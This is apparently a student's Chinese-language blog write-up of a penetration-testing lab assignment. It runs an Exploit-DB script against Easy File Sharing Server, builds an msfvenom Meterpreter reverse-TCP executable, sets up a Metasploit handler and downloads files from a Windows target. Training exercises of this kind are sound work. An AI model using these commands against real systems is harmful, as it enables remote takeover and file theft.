网络渗透复现作业

最新推荐文章于 2024-07-13 12:57:00 发布
最新推荐文章于 2024-07-13 12:57:00 发布
阅读量379 收藏 8
点赞数 7
文章标签: 安全 linux 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_79000553/article/details/135289742
版权

  • 一、漏洞渗透测试

  • 1、靶机(Windows)安装

    easy file sharing server(efssetup_2018.zip),该服务存在漏洞。

  • 2、利用Nmap扫描发现靶机(Windows)运行了该服务。

  • 3.用searchsploit easy file sharing 指令(左边是漏洞渗透模块的名称,右边是所在的位置)

4.随机选取一个漏洞 eg选取38526.py,对应所在位置

python2  /usr/share/exploitdb/exploits/windows/remote/38526.py

我们可以输入指令

python2 /usr/share/exploitdb/exploits/windows/remote/38526.py 靶机ip 端口号

5.然后靶机上就运行了计算器

 

二、Metasploit应用

1、生成主控端、被控端。

在kali中输入命令

msfvenom -p windows/meterpreter/reverse_tcp lhost=ip地址 lport=端口号 -f exe -o /root/payload.exe

lport那里是端口号,root后面文件名可以自己设置,必须是exe可执行文件

会在kali中生成文件

2.启动主控端

终端输入msfconsole指令打开Metasploit

启动handler命令

口号:use exploit/multi/handler

设置payload

设置lhost参数

修改lport参数

输入exploit开始监听(要先将payload文件移到靶机运行)

3.获得靶机(Windows)控制权。

可输入指令load -l查询可以对靶机执行的指令 输入指令ls查看靶机桌面的文件

4.下载靶机上任意一个文件。

可使用指令download +文件名下载

hsnowt
关注
  • 7
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
网络渗透作业
qq_67829282的博客
03-16 2972
1、Whois查询 whois是一个标准的互联网协议,在whois查询中,能找到很多跟域名有关的信息,例如域名注册时间,域名所有人,一般的小型网站域名所有人是网站管理员。 常用的查询网址有爱站(https://whois.aizhan.com)站长之家(http://whois.chinaz.com)和Virus Total(https://www.virustotal.com) 2、通过搜索引擎收集敏感信息 Google是世界上最强的搜索引擎之-对一位渗透测试者而言,它可能是款绝住的黑客工具,我们
网络渗透测试课作业
weixin_51939939的博客
12-13 2509
一、WinPE启动盘制作 1、什么是winpe启动盘 winpe就是一个精简的windows系统。长期的dos无界面那种系统已经无法满足当下的需求。我们需要更方便且可视化的维护系统,那么它就诞生了。 PE启动盘 其实就是一种紧急系统,可以通过设置BIOS的启动先后顺序使PE在电脑刚启动时优先引导启动,是使用工具在Windows界面下制作的一个简易的、临时的、应急用系统。 为什么这么说呢,PE系统下,可以进行备份操作,可以安装系统,但是其他的可执行程序就只有很少才能运行。 通常我们是不使用PE系统的
渗透测试作业3
qq_73604266的博客
11-16 65
例如:搜索Cisco +country:"CN"(Cisco中国地区),可以得到Cisco中国地区的相关设备信息。ZoomEye(钟馗之眼)是一个强大的网络空间搜索引擎,可以按输入搜索到各种联网设备。①与Zoomeye功能类似的搜索引擎还有那些?②利用Zoomeye进行相关搜索并截图。在线爆破目标网站子域名。
网络渗透课实践作业-2
m0_73942138的博客
11-15 46
是一个网络安全搜索引擎,它通过使用各种网络协议和技术来扫描和检索各种网络设备。还可以提供有关设备的基本信息,这些信息对于网络安全评估和漏洞分析非常有用。比如在zoomeye里搜索Cisco,就可以得到部分Cisco摄像头的信息。子域名可以通过搜索引擎直接查找已经爬取的子域名,比如运用搜索引擎语法site:将搜索范围限定在特定的站点中。点击相应的设备可以查看相关设备的详细信息,包括IP地址、开放端口、操作系统、软件版本以及相关漏洞。这些设备信息和相关漏洞就能够用来供他人进行安全评估和研究分析。
web安全大作业
09-18
web安全大作业,关于渗透测试方面,让你真正明白web安全的意义,去探索那背后的秘密。web安全找准云安全服务与解决方案提供商安全狗,全方位立体防护服务器安全.有效抗CC/抗DDOS,防黑防篡改,修复漏洞,查杀病毒,防暴力破解,全面解决安全运维难题。
使用numpy复现贝叶斯网络
10-16
在这个主题中,我们将深入探讨如何使用Python的科学计算库NumPy来复现贝叶斯网络的基本概念和操作。NumPy是Python生态系统中的核心库,提供了高效的多维数组对象和各种数学函数,非常适合进行数值计算。 首先,我们...
采用matlab复现深度网络
04-09
本篇文章将详细探讨如何在MATLAB环境中复现深度网络,主要涉及以下几个方面: 1. **MATLAB深度学习工具箱**:MATLAB的深度学习工具箱提供了预定义的网络架构,如卷积神经网络(CNN)、循环神经网络(RNN)和长短期...
渗透基础笔记+作业(永恒之蓝复现
09-08
渗透测试是一种重要的网络安全评估方法,旨在模拟黑客攻击行为,揭示潜在的安全漏洞,以增强系统防护能力。这个过程涉及多个步骤,从前期交互开始,到后期的渗透攻击和报告撰写。 前期交互是渗透测试的起点,测试...
numpy复现多层感知机网络
10-16
本教程将使用Python中的科学计算库NumPy来复现多层感知机网络,这对于初学者来说是一个很好的起点,因为它可以帮助理解神经网络的基本工作原理。 一、NumPy简介 NumPy是Python中用于数值计算的核心库,它提供了强大...
网络渗透测试复现任务(1).pdf
11-07
网络渗透测试复现任务(1).pdf
渗透测试作业
BerL1n
12-29 432
Raven:靶机下载:https://pan.baidu.com/s/18p0Jir7eH0BL1Na_6ybRtg ip地址扫描 利用kali下arp-scan -l扫出ip 服务器,这也不知道账号密码,所以无法确定其Ip地址,因为处于vm中和其他虚拟机一个段,扫描存活主机。 发现有四台存活主机,尝试发现192.168.198.137是改网站ip。 还可以用nmap去扫描 端口扫描 可...
移动互联安全扩展要求测评项
hakksjss的博客
07-10 1100
应为无线接入设备的安装选择合理位置,避免过度覆盖和电磁干扰。无线接入设备的安装位置选择不当,易被攻击者利用,特别是攻击者会通过无线信号过度覆盖的弱点进行无线渗透攻击,因此要选择合理的位置安装无线接入设备。
车载视频监控管理方案:无人驾驶出租车安全出行的保障
TSINGSEE青犀视频官方技术博客
07-12 588
为了确保数据的安全性和可靠性,本方案采用云存储技术,将车辆视频数据和相关信息存储在云端。
中小学校园EasyCVR视频综合监管方案:构建安全、智能的校园环境
TSINGSEE青犀视频官方技术博客
07-10 1112
针对校园食堂后厨、仓库、配菜、清洗等监控区域的环境卫生与安全等进行全面的监管,及时发现违规异常情况,并能向监管人员及时发送告警信息,保障在校师生的食品与饮食安全
[图解]SysML和EA建模住宅安全系统-14-黑盒系统规约
rolt的专栏
07-10 797
系统的外部可观察行为和物理特征
Foxit Reader:高效、安全、多功能的PDF阅读器技术解析
运维人生
07-10 462
由福建福昕软件开发股份有限公司开发,是一款轻量级、高效且功能丰富的PDF阅读器。它不仅拥有比同类产品更小的安装包体积和更快的打开速度,还全面支持最新的PDF文档属性,并提供了丰富的插件和自定义选项,极大地提升了用户体验。
等保测评新趋势:应对数字化转型中的安全挑战
A526847的博客
07-09 633
通过建立健全等保测评体系、加强技术研究和培训、构建安全生态系统、强化合规性管理以及加强数据安全和隐私保护等措施,企业可以更有效地应对数字化转型中的安全挑战,确保信息系统的安全性和合规性,为企业的业务创新和发展提供坚实的保障。针对数字化转型的特点,制定专门的等保测评标准和流程,加强对数据生命周期管理、数据脱敏、隐私保护等方面的要求。引入先进的安全技术和工具,提升等保测评的自动化和智能化水平。大数据、人工智能、机器学习等技术的引入,将极大地提升等保测评的自动化和智能化水平。一、等保测评的新趋势。
ISA95-Part5-安全和权限管理的设计思路
最新发布
阿拉伯梳子的专栏
07-13 591
1、具体要求:在MES/MOM系统中实现ISA-95标准的安全和权限管理,具体要求通常包括以下几个方面:1. --数据保护--:确保敏感数据通过加密和安全存储来保护,防止数据泄露或被未授权访问。2. --访问控制--:实施基于角色的访问控制(RBAC),确保只有授权用户才能访问相应资源和数据。3. --用户身份验证--:通过强密码策略、多因素认证等手段,确保用户身份的真实性。4. --审计跟踪--:记录和监控用户操作,以便于事后审计和问题追踪。
护佑未来!引领儿童安全新时代的AI大模型
qq_42538588的博客
07-10 997
随着人工智能技术的飞速发展,人们开始意识到AI在儿童安全方面具有巨大的潜在作用。传统的儿童安全教育通常需要大量的人力物力投入,而且存在一定的局限性,例如传统的教育方法可能无法覆盖到每个儿童,也难以做到实时监控和预防潜在的安全风险。而AI技术恰恰可以弥补这些不足,为儿童安全提供更加全面、精准的保障。
tranformer网络如何复现实验
07-11
复现Transformer网络的实验,你需要进行以下步骤1. 数据准备:选择适合的数据集,并进行预处理,例如分词、标记化等。确保集被划分为训练集、验证和测试集。 2. 构建模型:按照Transformer的架构,构建模型的编码...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值